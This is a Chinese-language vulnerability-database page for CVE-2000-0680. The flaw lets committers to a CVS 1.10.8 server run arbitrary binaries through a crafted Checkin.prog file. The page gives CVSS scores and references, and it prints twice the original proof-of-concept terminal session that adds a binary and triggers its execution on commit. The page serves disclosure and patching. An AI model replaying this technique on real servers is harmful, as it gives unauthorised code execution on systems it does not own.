CVE-2000-0680
CVSS7.2
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:37
NMCOES    

[原文]The CVS 1.10.8 server does not properly restrict users from creating arbitrary Checkin.prog or Update.prog programs, which allows remote CVS committers to modify or create Trojan horse programs with the Checkin.prog or Update.prog names, then performing a CVS commit action.


[CNNVD]CVS Checkin.prog二进制执行漏洞(CNNVD-200010-046)

        CVS 1.10.8 server不正确限制用户创建任意Checkin.prog或Update.prog程序,远程CVS委托可以利用该漏洞修改或创建名为Checkin.prog或Update.prog的特洛伊木马程序,然后执行CVS委托操作。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0680
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0680
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-046
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1524
(VENDOR_ADVISORY)  BID  1524
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26msg%3Dhvou2daoebb.fsf%40serein.m17n.org
(VENDOR_ADVISORY)  BUGTRAQ  20000728 cvs security problem

- 漏洞信息

CVS Checkin.prog二进制执行漏洞
高危 访问验证错误
2000-10-20 00:00:00 2005-10-20 00:00:00
远程※本地  
        CVS 1.10.8 server不正确限制用户创建任意Checkin.prog或Update.prog程序,远程CVS委托可以利用该漏洞修改或创建名为Checkin.prog或Update.prog的特洛伊木马程序,然后执行CVS委托操作。

- 公告与补丁

        Tanaka Akira has provided a patch for CVS 1.10.8 .
        CVS Kit CVS Server 1.10 .8
        

- 漏洞信息 (20108)

CVS Kit CVS Server 1.10 .8 Checkin.prog Binary Execution Vulnerability (EDBID:20108)
unix local
2000-06-28 Verified
0 Tanaka Akira
N/A [点击下载]
source: http://www.securityfocus.com/bid/1524/info

A CVS committer can execute arbitrary binaries by using Checkin.prog. Usually CVS/Checkin.prog in a working directory is copied from CVSROOT/modules when the directory is "checkout"ed and it is sent back to the server and executed with committing. Note that when it is executed, committed files exist in the current directory.

Since a working directory can be modified by a committer, Checkin.prog may be modified or even newly created. If a malicious committer does this, cvs server executes the modified Checkin.prog. Also note that the committer can create an arbitrary binary file by `cvs add -kb' and `cvs commit'. The malicious committer can execute the recently committed binary file via Checkin.prog triggered by the `cvs commit'.

% cvs -d :pserver:test@localhost:/tmp/cvs -f co somemodule
cvs server: Updating somemodule
% cd somemodule
% cp /bin/ls binary
% cvs add -kb binary
cvs server: scheduling file `binary' for addition
cvs server: use 'cvs commit' to add this file permanently
% echo ./binary > CVS/Checkin.prog
% cvs commit -m 'test'
cvs commit: Examining .
RCS file: /tmp/cvs/somemodule/binary,v
done
Checking in binary;
/tmp/cvs/somemodule/binary,v <-- binary
initial revision: 1.1
done
cvs server: Executing ''./binary' '/tmp/cvs/somemodule''
#cvs.lock
#cvs.wfl.serein.m17n.org.14330
binary,v 		

- 漏洞信息

7408
CVS Checkin.prog/Update.prog Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-06-28 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or vendor upgrades to correct this issue. However, Tanaka Akira has released an unofficial patch to address this vulnerability. As with all third-party solutions, ensure they come from a reliable source and are permitted under your company's security policy.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

CVS Checkin.prog Binary Execution Vulnerability
Access Validation Error 1524
Yes Yes
2000-07-28 12:00:00 2009-07-11 02:56:00
Posted to BugTraq on July 28, 2000 by Tanaka Akira <akr@m17n.org>

- 受影响的程序版本

CVS Kit CVS Server 1.10 .8

- 漏洞讨论

A CVS committer can execute arbitrary binaries by using Checkin.prog. Usually CVS/Checkin.prog in a working directory is copied from CVSROOT/modules when the directory is "checkout"ed and it is sent back to the server and executed with committing. Note that when it is executed, committed files exist in the current directory.

Since a working directory can be modified by a committer, Checkin.prog may be modified or even newly created. If a malicious committer does this, cvs server executes the modified Checkin.prog. Also note that the committer can create an arbitrary binary file by `cvs add -kb' and `cvs commit'. The malicious committer can execute the recently committed binary file via Checkin.prog triggered by the `cvs commit'.

- 漏洞利用

% cvs -d :pserver:test@localhost:/tmp/cvs -f co somemodule
cvs server: Updating somemodule
% cd somemodule
% cp /bin/ls binary
% cvs add -kb binary
cvs server: scheduling file `binary' for addition
cvs server: use 'cvs commit' to add this file permanently
% echo ./binary &gt; CVS/Checkin.prog
% cvs commit -m 'test'
cvs commit: Examining .
RCS file: /tmp/cvs/somemodule/binary,v
done
Checking in binary;
/tmp/cvs/somemodule/binary,v &lt;-- binary
initial revision: 1.1
done
cvs server: Executing ''./binary' '/tmp/cvs/somemodule''
#cvs.lock
#cvs.wfl.serein.m17n.org.14330
binary,v

- 解决方案

Tanaka Akira <akr@m17n.org> has provided a patch for CVS 1.10.8 .


CVS Kit CVS Server 1.10 .8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站